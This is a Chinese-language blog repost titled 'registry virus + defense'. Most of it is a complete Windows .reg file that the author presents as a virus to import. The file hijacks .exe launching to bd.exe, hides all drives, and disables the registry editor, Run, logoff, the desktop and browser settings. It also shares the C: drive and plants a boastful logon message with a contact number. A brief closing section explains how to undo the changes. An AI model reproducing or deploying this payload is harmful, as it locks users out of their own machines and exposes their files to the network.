病毒+防御

藍(lán)脃兲涳 2009-08-07

展開全文

發(fā)個(gè)注冊表病毒+防御(2009-05-23 16:50:03)

標(biāo)簽：注冊表病毒雜談

分類：MOON-HACKer

Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\exefile\shell\open\command]
""="c:\\windows\\bd.exe"

[HKEY_CLASSES_ROOT\exefile\DefaultIcon]
""="c:\\windows\\xm.ico"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer]
"NoDrives"=dword:FFFFFFFF

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NotrayContextMenu"=dword:00000001
"NoChangeStartMenu"=dword:00000001
"NoChangeStartMenu"=dword:00000001
"NoStartMenuMFUprogramslist"=dword:00000001
"NoDesktop"=dword:00000001
"NoDispAppearancePage"=dword:00000001
"NoLogOff"=dword:00000001
"NoRecentDocsMenu"=dword:00000001
"NoSetFolders"=dword:00000001
"NoRun"=dword:00000001
"NoClose"=dword:00000001
"NoViewContextMenu"=dword:00000001

[HKEY_LOCAL_MACHINE\Software\CLASSES\.reg\]
""="txtfile"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"ScanRegistry"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000001

[HKEY_CURRENT_USER\Control Panel\Desktop]
"MenuShowDelay"=999

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"LegalNoticeCaption"="你的電腦被飛劍吹雪黑了 QQ：784161329"
"LegalNoticeText"="別人笑我太瘋癲，我笑他人看不穿"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem\CDFS]
"Prefetch"=dword:00 00 09 00
"CacheSize"=dword:AC 09 00 00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]
"AutoShareServer"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]
"IPEnableRouter"=dword:00000000

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoSetTaskbar"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"NoSaveSettings"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp]
"Disabled"=dword:00000001
"NoRealMode"=dword:00000001

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions]
"NoBrowserContextMenu"=dword:00000001
"NoBrowserOptions"=dword:00000001
"NoBrowserSaveAs"=dword:00000001
"NoFileOpen"=dword:00000001

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel]
"Advanced"=dword:00000001
"Cache Internet"=dword:00000001
"AutoConfig"=dword:00000001
"HomePage"=dword:00000001
"History"=dword:00000001
"Connwiz Admin Lock"=dword:00000001
"SecurityTab"=dword:00000001
"ResetWebSettings"=dword:00000001

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions]
"NoViewSource"=dword:00000001

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions]
"NoAddingSubScriptions"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoFileMenu"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\C$]
"Flags"=dword:302
"Type"=dword:00000000
"Path"="C:\\"

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://blog.sina.com.cn/zhaoqiangpersonal"
"Window Title"="飛劍吹雪歡迎你"

將以上信息保存為reg格式，導(dǎo)入注冊表就中病毒了（當(dāng)然啊，一般是編寫軟件導(dǎo)入的，俺不做壞事，呵呵~~~~）

如果中了病毒怎么辦？特征：注冊表打不開，無法運(yùn)行，任務(wù)管理器打不開 ……………………太多了

1，如果注冊表可以導(dǎo)入，即雙擊.reg格式的文件可以導(dǎo)入到注冊表就相應(yīng)的將注冊表的鍵值改過來

例如："NoLogOff"=dword:00000001 不能注銷，我們改為NoLogOff"=dword:00000000，然后導(dǎo)入注冊表

2，注冊表根本就不能導(dǎo)入

下載od ，并編寫一個(gè)可以打開運(yùn)行，注冊表……的改注冊表的軟件

因?yàn)橐话悴《靖腥緀xe，即修改exefile=后的鍵值不能運(yùn)行exe了

我們打開方式選擇od 然后f9運(yùn)行，就可以解除

本站是提供個(gè)人知識(shí)管理的網(wǎng)絡(luò)存儲(chǔ)空間，所有內(nèi)容均由用戶發(fā)布，不代表本站觀點(diǎn)。請注意甄別內(nèi)容中的聯(lián)系方式、誘導(dǎo)購買等信息，謹(jǐn)防詐騙。如發(fā)現(xiàn)有害或侵權(quán)內(nèi)容，請點(diǎn)擊一鍵舉報(bào)。

轉(zhuǎn)藏 分享

QQ空間 QQ好友新浪微博微信

獻(xiàn)花（0） +1

來自：藍(lán)脃兲涳 > 《我的圖書館》

舉報(bào)/認(rèn)領(lǐng)